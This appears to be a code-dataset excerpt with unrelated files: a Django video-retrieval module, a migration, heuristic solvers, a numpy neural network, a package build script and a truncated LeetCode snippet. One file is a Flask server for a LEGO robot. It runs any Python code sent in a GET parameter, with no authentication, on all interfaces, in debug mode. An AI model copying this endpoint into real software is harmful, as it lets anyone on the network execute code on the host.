env, scenario = ring_road_exp_setup()
exp = SumoExperiment(env, scenario)
exp.run(num_runs=2, num_steps=10)
pos2 = [exp.env.vehicles.get_speed()]
        # check that the final speeds are the same in both instances
np.testing.assert_array_almost_equal(pos1, pos2)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
8db382600a6c2222a8a6ea6b955040db65f761e6 | 8677cb237360646e893e6aa1949d0e3a2d5acee5 | /server/dvaapp/operations/retrieval.py | a062d97b87d08a68d9bc403f83bb0d449b63ab9a | [
"BSD-3-Clause",
"Apache-2.0",
"MIT"
] | permissive | hitlk/DeepVideoAnalytics | b92f39c1552aa239d1eb98b051a3ca86b96059b9 | c6893b3eb5855430c1267a6d6f0a6a168b89fe94 | refs/heads/master | 2020-03-22T17:39:00.160352 | 2018-07-10T08:30:02 | 2018-07-10T08:30:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,158 | py | import logging
from .approximation import Approximators
from .indexing import Indexers
from collections import defaultdict
try:
from dvalib import indexer, retriever
import numpy as np
except ImportError:
np = None
logging.warning("Could not import indexer / clustering assuming running in front-end mode")
from ..models import IndexEntries, QueryResult, Region, Retriever
class Retrievers(object):
_visual_retriever = {}
_retriever_object = {}
_index_count = defaultdict(int)
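    # class-level caches shared across calls: retrievers stay loaded, and
    # refresh_index() below reloads entries only when the IndexEntries count changes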
@classmethod
def get_retriever(cls, retriever_pk):
if retriever_pk not in cls._visual_retriever:
dr = Retriever.objects.get(pk=retriever_pk)
cls._retriever_object[retriever_pk] = dr
if dr.algorithm == Retriever.EXACT and dr.approximator_shasum and dr.approximator_shasum.strip():
approximator, da = Approximators.get_approximator_by_shasum(dr.approximator_shasum)
da.ensure()
approximator.load()
cls._visual_retriever[retriever_pk] = retriever.BaseRetriever(name=dr.name, approximator=approximator)
elif dr.algorithm == Retriever.EXACT:
cls._visual_retriever[retriever_pk] = retriever.BaseRetriever(name=dr.name)
elif dr.algorithm == Retriever.FAISS and dr.approximator_shasum is None:
di = Indexers.get_indexer_by_shasum(dr.indexer_shasum)
cls._visual_retriever[retriever_pk] = retriever.FaissFlatRetriever(name=dr.name,
components=di.arguments[
'components'])
elif dr.algorithm == Retriever.FAISS:
approximator, da = Approximators.get_approximator_by_shasum(dr.approximator_shasum)
da.ensure()
approximator.load()
cls._visual_retriever[retriever_pk] = retriever.FaissApproximateRetriever(name=dr.name,
approximator=approximator)
elif dr.algorithm == Retriever.LOPQ:
approximator, da = Approximators.get_approximator_by_shasum(dr.approximator_shasum)
da.ensure()
approximator.load()
cls._visual_retriever[retriever_pk] = retriever.LOPQRetriever(name=dr.name,
approximator=approximator)
else:
raise ValueError("{} not valid retriever algorithm".format(dr.algorithm))
return cls._visual_retriever[retriever_pk], cls._retriever_object[retriever_pk]
@classmethod
def refresh_index(cls, dr):
# TODO improve this by either having a separate broadcast queues or using redis
last_count = cls._index_count[dr.pk]
current_count = IndexEntries.objects.count()
visual_index = cls._visual_retriever[dr.pk]
if last_count == 0 or last_count != current_count or len(visual_index.loaded_entries) == 0:
cls._index_count[dr.pk] = current_count
cls.update_index(dr)
@classmethod
def update_index(cls, dr):
source_filters = dr.source_filters.copy()
# Only select entries with completed events, otherwise indexes might not be synced or complete.
source_filters['event__completed'] = True
if dr.indexer_shasum:
source_filters['indexer_shasum'] = dr.indexer_shasum
if dr.approximator_shasum:
source_filters['approximator_shasum'] = dr.approximator_shasum
else:
source_filters['approximator_shasum'] = None # Required otherwise approximate index entries are selected
index_entries = IndexEntries.objects.filter(**source_filters)
visual_index = cls._visual_retriever[dr.pk]
for index_entry in index_entries:
if index_entry.pk not in visual_index.loaded_entries and index_entry.count > 0:
if visual_index.algorithm == "LOPQ":
vectors, entries = index_entry.load_index()
logging.info("loading approximate index {}".format(index_entry.pk))
visual_index.load_index(None,entries,index_entry.video_id,index_entry.target)
visual_index.loaded_entries.add(index_entry.pk)
elif visual_index.algorithm == 'FAISS':
index_file_path, entries = index_entry.load_index()
logging.info("loading FAISS index {}".format(index_entry.pk))
visual_index.load_index(index_file_path, entries, index_entry.video_id, index_entry.target)
visual_index.loaded_entries.add(index_entry.pk)
else:
vectors, entries = index_entry.load_index()
logging.info("Starting {} in {} with shape {}".format(index_entry.video_id, visual_index.name,
vectors.shape))
try:
visual_index.load_index(vectors, entries, index_entry.video_id, index_entry.target)
visual_index.loaded_entries.add(index_entry.pk)
                except Exception:
                    logging.error("Failed to load {} vectors shape {} entries {}".format(
                        index_entry.video_id, vectors.shape, len(entries)))
else:
logging.info("finished {} in {}".format(index_entry.pk, visual_index.name))
@classmethod
def retrieve(cls, event, retriever_pk, vector, count, region_pk=None):
index_retriever, dr = cls.get_retriever(retriever_pk)
cls.refresh_index(dr)
results = index_retriever.nearest(vector=vector, n=count)
qr_batch = []
for rank, r in enumerate(results):
qr = QueryResult()
if region_pk:
qr.query_region_id = region_pk
qr.query = event.parent_process
qr.retrieval_event_id = event.pk
if r['type'] == 'regions':
dd = Region.objects.get(pk=r['id'])
qr.region = dd
qr.frame_index = dd.frame_index
qr.video_id = dd.video_id
elif r['type'] == 'frames':
qr.frame_index = int(r['id'])
qr.video_id = r['video']
else:
raise ValueError("No key found {}".format(r))
qr.algorithm = dr.algorithm
qr.rank = int(r.get('rank', rank+1))
qr.distance = int(r.get('dist', rank+1))
qr_batch.append(qr)
if region_pk:
event.finalize_query({"QueryResult":qr_batch},results={region_pk:{"retriever_state":index_retriever.findex}})
else:
event.finalize_query({"QueryResult":qr_batch},results={"retriever_state":index_retriever.findex})
event.parent_process.results_available = True
event.parent_process.save()
return 0
| [
"[email protected]"
] | |
2913688c07ba663536d12729e1d5735c2330e5eb | 2fd39a6995f86189ac39bc93081afba587247c2c | /products/migrations/0001_initial.py | 424d5755a51054af73aa688ed9134b5a7ebf538b | [
"Apache-2.0"
] | permissive | Garendat/django_example_shop | 370352d75ae92e74d4e866a9fe5dac9833c22175 | a9af913ea3870e6b625a02938e82bda4d4539633 | refs/heads/master | 2020-03-19T20:29:37.317019 | 2018-06-11T17:55:18 | 2018-06-11T17:55:18 | 136,904,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-05-30 22:36
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, default=None, max_length=64, null=True)),
('description', models.TextField(blank=True, default=None, null=True)),
('is_active', models.BooleanField(default=True)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
],
options={
                'verbose_name': 'Товар',  # "Product"
                'verbose_name_plural': 'Товары',  # "Products"
},
),
]
| [
"[email protected]"
] | |
857abb3fb8b1d73b1ac3d00c9cf609163be80efb | 35c4aa0e912c9b6e8543f032edd52bb78fa752ef | /ParteReal/server_LEGOEv3.py | 0d461d71b27ec67d03c8a009107fddded711922d | [] | no_license | RoboticsLabURJC/2020-tfg-daniel-pulido | 81c3c6b514a5d61bc3392feafdf66406a1ef7956 | a6da755227e547fff63452fda214544c438ff812 | refs/heads/master | 2021-07-25T16:34:36.891382 | 2020-12-25T19:05:31 | 2020-12-25T19:05:31 | 233,579,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,139 | py | import subprocess
import os
import signal
import time
from flask import Flask, make_response, request
app = Flask(__name__)
exercice = None
@app.route('/run',methods=["GET"])
def run_program():
global exercice
code = request.args.get('python_code')
print(code)
# Stop process have already up
if exercice:
try:
os.killpg(os.getpgid(exercice.pid), signal.SIGKILL)
except ProcessLookupError:
pass
time.sleep(2)
    # Create ejercicio.py from the submitted code
    code = code[1:-1].split("\\n")
    with open("./ejercicio.py", "w") as fdOut:  # `with` flushes and closes the file before the subprocess runs it
        for line in code:
            fdOut.write(line + "\n")
# Run process
exercice = subprocess.Popen(["python","ejercicio.py"],stdout=subprocess.PIPE,preexec_fn=os.setsid)
headers = {'Content-Type': 'text/plain','Access-Control-Allow-Origin': '*'}
return make_response('Ok', 200,headers)
# ----------------------------------------------------------------------
# MAIN PROGRAM
# ----------------------------------------------------------------------
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8001, debug=True)
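# Example request (added; shown unencoded for readability - the handler strips
# the outer quotes and splits on a literal "\n" sequence):
#   curl 'http://localhost:8001/run?python_code="print(1)\nprint(2)"'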
| [
"[email protected]"
] | |
ee2844486c8fd3c2eeb7fe051384ec757b33fffd | 36553cda80a53dae03d9172c139901b461c8820c | /diff_content_extraction/base.py | 516d322783fa88a8f467dda695e128ab0d908bcc | [] | no_license | JointEntropy/diff_content_extraction | 5a68dba16c1b0fe74a1de9843663e6c19db21fcc | 3b8b9828e1e95d02c4a8db1e5d3408635d3c59d4 | refs/heads/master | 2023-07-07T15:45:40.469605 | 2021-08-08T16:37:27 | 2021-08-08T16:37:27 | 393,965,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,447 | py | from functools import lru_cache
from tqdm import tqdm
from itertools import chain, product, combinations
from collections import Counter, defaultdict
import pandas as pd
from lxml import html, etree
import os
from diff_content_extraction.attribute_extraction import extract_attribs
from diff_content_extraction.xpath_utils import find_ancestor_node
def flat_xpaths_attrs(lst):
for l in lst:
for k in l:
xpath = k['xpath']
for attr in k['attribs']:
yield (xpath, attr)
def collect_xpath_texts(xpath, node):
if 'script' in xpath:
return set()
texts_set = set()
for find_node in node.xpath(xpath):
        if getattr(find_node, 'text', None) and find_node.text.strip():
texts_set.add(find_node.text)
return texts_set
def jaccard(a, b):
return len(a & b) / len(a | b)
def compare_xpath_entities(xpath, node1, node2):
a_set = collect_xpath_texts(xpath, node1)
b_set = collect_xpath_texts(xpath, node2)
if len(a_set) == 0:
return False
if abs(jaccard(a_set, b_set)) < 0.05:
return True
return False
def extract_pairwise_paths(dataset):
parse_html = lru_cache(html.fromstring)
results_lst = []
for a, b in tqdm(product(dataset.keys(), dataset.keys()), total=int(len(dataset) ** 2)):
if a == b:
continue
r1_dom = parse_html(dataset[a]['html'])
r2_dom = parse_html(dataset[b]['html'])
tree = etree.ElementTree(r1_dom)
collected_xpaths = []
for e in r1_dom.iter():
pth = tree.getpath(e)
if compare_xpath_entities(pth, r1_dom, r2_dom):
attribs = extract_attribs(pth, r1_dom, min_support=0.5)
collected_xpaths.append(dict(xpath=pth, attribs=attribs))
results_lst.append(dict(a=a, b=b, xpaths=collected_xpaths))
res_df = pd.DataFrame(results_lst)
return res_df
def extract_dataset(items_iter):
"""
    Builds a dataset from the scraped pages' data.
"""
pages_data = []
for t in items_iter:
pages_data.append(dict(url=t['_id'], html=t['html']))
pages_df = pd.DataFrame(pages_data)
# pages_df = pages_df[pages_df['url'].apply(lambda x: 'https://topliba.com/books/' in x)]
dataset = pages_df.set_index('url').to_dict('index')
return dataset
def extract_stable_xpaths_data(pairwise_paths, min_support=0.):
# counts = Counter(list(chain.from_iterable(pairwise_paths['xpaths'])))
counts = Counter(list(flat_xpaths_attrs(pairwise_paths['xpaths'])))
stat_df = pd.DataFrame([dict(path=k, count=v) for k, v in counts.items()])
stat_df['total'] = pairwise_paths.shape[0]
stat_df['normalized'] = stat_df['count'] / stat_df['total']
stat_df['root'] = stat_df['path'].apply(lambda x: find_ancestor_node(x[0]))
stat_df['root_total'] = stat_df.groupby('root')['count'].transform(sum)
stat_df['root_total_normalized'] = stat_df['root_total'] / stat_df['total']
    # TODO: the counting here has overlap errors; count_total can be > total
msk = (stat_df['root_total_normalized'] > min_support) | (stat_df['normalized'] > min_support)
filtered_paths = stat_df.loc[msk, 'path'].tolist()
result = defaultdict(list)
for k in filtered_paths:
result[k[0]].append(k[1])
return result
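# Hedged usage sketch (added; the scraped-items iterable is an assumption):
#   dataset = extract_dataset(items)             # items: dicts with '_id' and 'html'
#   pairs_df = extract_pairwise_paths(dataset)   # O(n^2) pairwise page comparisons
#   stable = extract_stable_xpaths_data(pairs_df, min_support=0.3)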
| [
"[email protected]"
] | |
1a636a55e34e6cc9d3fd4c0e903a12ec085870a7 | 6cb25961b9aecf0470c6653fc2f01e11a3196b00 | /Tugas Aplikasi 5 Latihan A.py | 33b5e9af415f9b2c83ccabeb168636596090d9bd | [] | no_license | Zaenil/Tugas-Aplikasi-2-RS-20083000189-Zaenil-Muttakin | d6bf233b7e804a2c2005d742f2062650f0984dc7 | bc7d5ea2cb7090a05bba16ac9fa2c5432a9b35d5 | refs/heads/main | 2023-05-19T10:09:00.542695 | 2021-06-11T18:49:25 | 2021-06-11T18:49:25 | 376,114,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Jun 11 16:30:40 2021
@author: Nik
"""
# Tugas Aplikasi 5 Latihan A (Application Assignment 5, Exercise A)
print("#####################################")
print(" Status Kelulusan Mahasiswa")  # "Student Pass Status"
print("#####################################")
N = input("Masukan Nilai Kelulusan = ")  # "Enter the grade = "
if int(N) > 60:
    print("Lulus")  # "Pass"
else:
    print("Tidak Lulus")  # "Fail"
| [
"[email protected]"
] | |
9d512ec6a49ff05ecdb9e912ad33a4fc7f4de9c7 | cd247a27b167d510193852a781af15b9ad007b5d | /integration_tests/test_runway_module_type_detection/tests/test_suffix_type_k8s.py | 9c8c6b15d1dd84c5a452c93efac5bdf57add49d4 | [
"Apache-2.0"
] | permissive | edgarpoce/runway | 0759f70429f384b60a85008a5954ae18e593e9aa | 94aebff4f83b294653192a1b74111f6a9f114de2 | refs/heads/master | 2021-07-09T07:45:04.476229 | 2020-04-04T04:08:07 | 2020-04-04T04:08:07 | 226,101,470 | 1 | 0 | Apache-2.0 | 2019-12-05T12:50:53 | 2019-12-05T12:50:53 | null | UTF-8 | Python | false | false | 1,048 | py | """Test to verify behavior of directory suffix based type"""
import subprocess
from runway.util import change_dir
from integration_tests.test_runway_module_type_detection.test_runway_module_type_detection import (
RunwayModuleTypeDetection
)
class TestSuffixTypeK8S(RunwayModuleTypeDetection):
"""Test to verify a 'type' directory suffix 'k8s' is respected."""
TEST_NAME = __name__
def deploy(self):
"""Deploy provider."""
self.copy_fixture('sampleapp.k8s')
self.copy_runway('suffix-k8s')
with change_dir(self.mtd_test_dir):
out = subprocess.check_output(['runway', 'deploy'], stderr=subprocess.STDOUT)
return 0 if "No kustomize overlay for this environment" in out.decode() else -1
def run(self):
"""Run tests."""
self.clean()
        assert self.deploy() == 0, '{}: Directory Suffix Type K8S Failed'.format(__name__)
def teardown(self):
"""Teardown."""
self.logger.info('Tearing down: %s', self.TEST_NAME)
self.clean()
| [
"[email protected]"
] | |
6736d192fe32d725c5d30bc50171e22e11797883 | 8472354323e12efce848fdee3d117f0c8d5e4dcc | /largesolver4.py | edbcbf08a05f6ed0927dc58bd8b5254aca7f1039 | [] | no_license | julianjic/170processing | 305f976522379ad6b402c157a980c73db18b1e88 | 86b15f7ae91bcd2bd3071e4d20c887301864b0b4 | refs/heads/master | 2020-04-09T04:14:40.116445 | 2018-12-02T18:58:09 | 2018-12-02T18:58:09 | 160,015,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,429 | py | import networkx as nx
import os
###########################################
# Change this variable to the path to
# the folder containing all three input
# size category folders
###########################################
path_to_inputs = "./all_inputs"
###########################################
# Change this variable if you want
# your outputs to be put in a
# different folder
###########################################
path_to_outputs = "./outputs"
def parse_input(folder_name):
'''
Parses an input and returns the corresponding graph and parameters
Inputs:
folder_name - a string representing the path to the input folder
Outputs:
(graph, num_buses, size_bus, constraints)
graph - the graph as a NetworkX object
num_buses - an integer representing the number of buses you can allocate to
size_buses - an integer representing the number of students that can fit on a bus
constraints - a list where each element is a list vertices which represents a single rowdy group
'''
graph = nx.read_gml(folder_name + "/graph.gml")
graph.remove_edges_from(graph.selfloop_edges())
parameters = open(folder_name + "/parameters.txt")
num_buses = int(parameters.readline())
size_bus = int(parameters.readline())
constraints = []
for line in parameters:
line = line[1: -2]
curr_constraint = [num.replace("'", "") for num in line.split(", ")]
constraints.append(curr_constraint)
return graph, num_buses, size_bus, constraints
def solve(graph, num_buses, size_bus, constraints):
#TODO: Write this method as you like. We'd recommend changing the arguments here as well
#Inputs: graph, num_buses, size_bus, constraints
#Heuristic Order #1
rowdy_number = {}
for rowdy_list in constraints:
for student in rowdy_list:
if student in rowdy_number:
rowdy_number[student] += 1
else:
rowdy_number[student] = 1
for student in graph.nodes():
if student not in rowdy_number:
rowdy_number[student] = 0
# print(len(rowdy_number))
#Heuristic Order #2
semi_popular_students = {}
for student in graph.nodes():
if graph.degree[student] <= size_bus:
semi_popular_students[student] = graph.degree()[student]
for student in graph.nodes():
if student not in semi_popular_students:
semi_popular_students[student] = 0
#Heuristic Order # 3
most_popular_students = {}
for student in graph.nodes():
most_popular_students[student] = graph.degree()[student]
# print(len(most_popular_students))
#Preprocessing of G' where G' is G, but without edges found in constraints
graph_prime = graph.copy()
#for student1 in graph_prime.nodes:
# for student2 in graph_prime.nodes:
# if graph_prime.has_edge(student1, student2):
# graph_prime[student1][student2]['weight'] = 1
# print(graph_prime[student1][student2]['weight'])
for edge in graph_prime.edges():
graph_prime[edge[0]][edge[1]]['weight'] = 1
for rowdy_list in constraints:
for student1 in rowdy_list:
for student2 in rowdy_list:
if graph_prime.has_edge(student1, student2):
graph_prime[student1][student2]['weight'] = 2
else:
graph_prime.add_edge(student1, student2)
graph_prime[student1][student2]['weight'] = 2
#Process Heuristics on G and G'
points1, buses1 = heuristic_one(graph_prime, num_buses, size_bus, constraints, rowdy_number)
points2, buses2 = heuristic_two(graph_prime, num_buses, size_bus, constraints, semi_popular_students)
points3, buses3 = heuristic_three(graph_prime, num_buses, size_bus, constraints, most_popular_students)
#points4, buses4 = heuristic_four(graph_prime, num_buses, size_bus, constraints)
#Do Optimization (AKA swapping students for specific amount of iterations!)
points1, buses1 = non_empty_bus_organizer(graph_prime, buses1, rowdy_number)
points2, buses2 = non_empty_bus_organizer(graph_prime, buses2, semi_popular_students)
points3, buses3 = non_empty_bus_organizer(graph_prime, buses3, most_popular_students)
#points4, buses4 = non_empty_bus_organizer(graph_prime, buses4, most_popular_students)
points1, buses1 = switch_optimizer(graph_prime, buses1, size_bus)
points2, buses2 = switch_optimizer(graph_prime, buses2, size_bus)
points3, buses3 = switch_optimizer(graph_prime, buses3, size_bus)
#points4, buses4 = switch_optimizer(graph_prime, buses4, size_bus)
#Compare Results
best_result = max(points1, points2, points3)
# best_result = max(points1, points3)
if (best_result == points1):
best_buses = buses1
elif (best_result == points2):
best_buses = buses2
elif (best_result == points3):
best_buses = buses3
#Create .out output_file
return best_buses
def switch_optimizer(graph_prime, buses, size_bus):
have_not_covered_all_students = True
while (have_not_covered_all_students):
switched = switcher(graph_prime, buses, size_bus)
if (switched != True):
have_not_covered_all_students = False
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
return overall_score, buses
def switcher(graph_prime, buses, size_bus):
for student in graph_prime:
original_bus = find_bus(student, buses)
original_bus_score = bus_score(graph_prime, original_bus)
leave_bus = original_bus.copy()
leave_bus.remove(student)
leave_bus_score = bus_score(graph_prime, leave_bus)
for bus in buses:
if len(bus) < size_bus:
current_bus = bus.copy()
current_bus_score_alone = bus_score(graph_prime, current_bus)
current_bus.append(student)
current_score = bus_score(graph_prime, current_bus)
                leaving_total = original_bus_score + current_bus_score_alone
                entering_total = current_score + leave_bus_score
                # move the student only when the swap strictly improves the combined score
                if (entering_total > leaving_total):
original_bus.remove(student)
bus.append(student)
return True
return False
def find_bus(student, buses):
for bus in buses:
if student in bus:
return bus
#def individual_bus_scores(graph_prime, buses):
# amortized = {}
# for bus in buses:
# score = bus_score(graph_prime, bus)
# amortized[bus.string()] = score
# return amortized
#Makes sure that a bus will not remain empty after the initial heuristics dictionaries are implemented
def non_empty_bus_organizer(graph_prime, buses, dictionary):
loner = ''
blacklist = []
for bus1 in buses:
if len(bus1) == 0:
for bus2 in buses:
if bool(dictionary) == False:
break
if list(dictionary.keys())[0] in bus2 and list(dictionary.keys())[0] not in blacklist:
loner = list(dictionary.keys())[0]
bus2.remove(list(dictionary.keys())[0])
bus1.append(loner)
blacklist.append(loner)
dictionary.pop(loner)
break
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
return overall_score, buses
def heuristic_one(graph_prime, num_buses, size_bus, constraints, rowdy_number):
#Sort students into buses
buses = [[] for _ in range(num_buses)]
best_bus = 0
best_score = 0
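    # note (added): best_bus/best_score are not reset per student, so earlier
    # placements bias later ones; heuristic_two and heuristic_three share this pattern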
for student in sorted(rowdy_number, key=rowdy_number.get, reverse=True):
for bus_num in range(num_buses):
if (len(buses[bus_num]) >= size_bus):
pass
else:
current_bus = buses[bus_num].copy()
current_bus.append(student)
current_score = bus_score(graph_prime, current_bus)
if (current_score >= best_score):
best_bus = bus_num
best_score = current_score
buses[best_bus].append(student)
#Create an overall score based on the bus list created, then returns it.
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
return overall_score, buses
def heuristic_two(graph_prime, num_buses, size_bus, constraints, semi_popular_students):
buses = [[] for _ in range(num_buses)]
best_bus = 0
best_score = 0
for student in sorted(semi_popular_students, key=semi_popular_students.get, reverse=True):
for bus_num in range(num_buses):
if (len(buses[bus_num]) >= size_bus):
pass
else:
current_bus = buses[bus_num].copy()
current_bus.append(student)
current_score = bus_score(graph_prime, current_bus)
if (current_score >= best_score):
best_bus = bus_num
best_score = current_score
buses[best_bus].append(student)
#Create an overall score based on the bus list created, then returns it.
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
return overall_score, buses
def heuristic_three(graph_prime, num_buses, size_bus, constraints, most_popular_students):
buses = [[] for _ in range(num_buses)]
best_bus = 0
best_score = 0
for student in sorted(most_popular_students, key=most_popular_students.get, reverse=True):
for bus_num in range(num_buses):
if (len(buses[bus_num]) >= size_bus):
pass
else:
current_bus = buses[bus_num].copy()
current_bus.append(student)
current_score = bus_score(graph_prime, current_bus)
if (current_score >= best_score):
best_bus = bus_num
best_score = current_score
buses[best_bus].append(student)
#Create an overall score based on the bus list created, then returns it.
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
return overall_score, buses
def heuristic_four(graph_prime, num_buses, size_bus, constraints):
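    # unused by solve(): the fixed-size chunking assigns only num_buses * chunk
    # students, leaving any remainder unplaced, and `leftover` is computed but never used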
buses = [[] for _ in range(num_buses)]
chunk = len(graph_prime.nodes()) // num_buses
leftover = len(graph_prime.nodes()) // chunk
end = chunk
start = 0
students = []
for student in graph_prime.nodes():
students.append(student)
for bus in buses:
for x in range(start, end):
bus.append(students[x])
start += chunk
end += chunk
print(buses)
#Create an overall score based on the bus list created, then returns it.
overall_score = 0
for bus in buses:
overall_score += bus_score(graph_prime, bus)
print(overall_score)
return overall_score, buses
def bus_score(graph_prime, bus):
score = 0
    for i in range(len(bus)):
        for j in range(i + 1, len(bus)):
            # index into the bus list: the graph nodes are student labels, not positions
            student1, student2 = bus[i], bus[j]
            if graph_prime.has_edge(student1, student2) and graph_prime[student1][student2]['weight'] == 1:
                score += 1
return score
def attendance(buses):
count = 0
for bus in buses:
count += len(bus)
# print(count)
def main():
'''
Main method which iterates over all inputs and calls `solve` on each.
The student should modify `solve` to return their solution and modify
the portion which writes it to a file to make sure their output is
formatted correctly.
'''
size_categories = ["large4"]
if not os.path.isdir(path_to_outputs):
os.mkdir(path_to_outputs)
for size in size_categories:
category_path = path_to_inputs + "/" + size
output_category_path = path_to_outputs + "/" + size
category_dir = os.fsencode(category_path)
if not os.path.isdir(output_category_path):
os.mkdir(output_category_path)
for input_folder in os.listdir(category_dir):
input_name = os.fsdecode(input_folder)
#if (input_name == '100'):
graph, num_buses, size_bus, constraints = parse_input(category_path + "/" + input_name)
solution = solve(graph, num_buses, size_bus, constraints)
output_file = open(output_category_path + "/" + input_name + ".out", "w")
#TODO: modify this to write your solution to your
# file properly as it might not be correct to
# just write the variable solution to a file
seat = 1
for bus in solution:
output_file.write("[")
for student in bus:
if (seat != 1):
output_file.write(", '" + student + "'")
if (seat == 1):
output_file.write("'" + student + "'")
seat += 1
seat = 1
output_file.write("]\n")
output_file.close()
print("Completed " + input_name)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
01290f806f555249284f5a1a8498ff5bc424695a | 66004eee30e5c750cd551c65149685e90809d920 | /src/two_layer_net.py | a66086ce40f96baf7add9750426c5cb25eea19c6 | [] | no_license | takya810/Hitoto | 434dcc5aa93a14af89d14ba3808e345d13823d06 | fcc794f90ee83d5fec0fc3e087e9c0d550477ac7 | refs/heads/master | 2021-01-22T08:47:47.570465 | 2017-06-14T14:17:36 | 2017-06-14T14:17:36 | 92,634,044 | 0 | 0 | null | 2017-06-14T14:17:37 | 2017-05-28T01:49:20 | null | UTF-8 | Python | false | false | 2,547 | py | # coding: utf-8
import sys, os
sys.path.append(os.pardir)  # allow importing files from the parent directory
import numpy as np
from common.layers import *
from common.gradient import numerical_gradient
from collections import OrderedDict
class TwoLayerNet:
def __init__(self, input_size, hidden_size, output_size, weight_init_std = 0.01):
        # initialize the weights
self.params = {}
self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
self.params['b1'] = np.zeros(hidden_size)
self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
self.params['b2'] = np.zeros(output_size)
        # create the layers
self.layers = OrderedDict()
self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
self.layers['Relu1'] = Relu()
self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
self.lastLayer = SoftmaxWithLoss()
def predict(self, x):
for layer in self.layers.values():
x = layer.forward(x)
return x
    # x: input data, t: labels (teacher data)
def loss(self, x, t):
y = self.predict(x)
return self.lastLayer.forward(y, t)
def accuracy(self, x, t):
y = self.predict(x)
y = np.argmax(y, axis=1)
if t.ndim != 1 : t = np.argmax(t, axis=1)
accuracy = np.sum(y == t) / float(x.shape[0])
return accuracy
    # x: input data, t: labels (teacher data)
def numerical_gradient(self, x, t):
loss_W = lambda W: self.loss(x, t)
grads = {}
grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
return grads
def gradient(self, x, t):
# forward
self.loss(x, t)
# backward
dout = 1
dout = self.lastLayer.backward(dout)
layers = list(self.layers.values())
layers.reverse()
for layer in layers:
dout = layer.backward(dout)
        # collect the gradients
grads = {}
grads['W1'], grads['b1'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
grads['W2'], grads['b2'] = self.layers['Affine2'].dW, self.layers['Affine2'].db
return grads
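if __name__ == '__main__':
    # Added smoke test (not in the original file): one SGD step on random data
    # to exercise the forward/backward pass; uses only the imports above.
    np.random.seed(0)
    net = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
    x = np.random.rand(3, 784)   # three fake flattened 28x28 images
    t = np.eye(10)[[1, 5, 9]]    # three one-hot labels
    grads = net.gradient(x, t)
    for key in ('W1', 'b1', 'W2', 'b2'):
        net.params[key] -= 0.1 * grads[key]  # in-place SGD update (the layers share these arrays)
    print('loss after one step:', net.loss(x, t))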
| [
"[email protected]"
] | |
26d153174133a79de9a7b6c4495f8cf437a24bfc | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2008-EOL/applications/multimedia/mpg123/actions.py | ccae8d836dcedb07abd6404326ce95dae81cccb8 | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 634 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005-2008 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
def setup():
pisitools.dosed("configure", "-faltivec")
autotools.configure('--with-audio="alsa oss" \
--with-cpu=sse \
--with-optimization=2')
def build():
autotools.make()
def install():
autotools.install()
pisitools.dodoc("ChangeLog","COPYING","NEWS", "README", "AUTHORS")
| [
"[email protected]"
] | |
749a22b88ff6059b07d70cf09630e298bc448a80 | c0c2cd59aedc9a9807d489b90874b5b454827061 | /leetcode/binarysearch/729.py | e2f2a1386b6229d0491efcd59a4abac0b5e92216 | [] | no_license | flyfatty/PythonTutorial | ce2ee3caf5e3f2428329f63713b1e6a655dba183 | d12021f8a078d62510bb40083ed1ea81af718df9 | refs/heads/master | 2023-05-08T14:48:50.998595 | 2021-05-07T15:43:13 | 2021-05-07T15:43:13 | 309,847,416 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,740 | py | # @Time : 2020/9/26 22:16
# @Author : LiuBin
# @File : 729.py
# @Description :
# @Software: PyCharm
"""我的日程安排表 I
关键字: 二分查找
目标:每次申请一个区间,如果区间出现重叠返回False,否则开辟区间并返回True
思路:
1、二分查找,维护每个区间start的有序列表
2、使用字典维护start:end。如果能进入start列表,一定满足 i+1的start>=i的end(左闭右开)
3、找出所有重叠的情况,剩下的就可以加入start列表,并且更新字典
"""
class MyCalendar:
def __init__(self):
self.map = dict()
self.slist = list()
def binary_search(self, n, s, e):
if s >= e:
return s
m = (s + e) >> 1
if self.slist[m] > n:
return self.binary_search(n, s, m)
elif self.slist[m] < n:
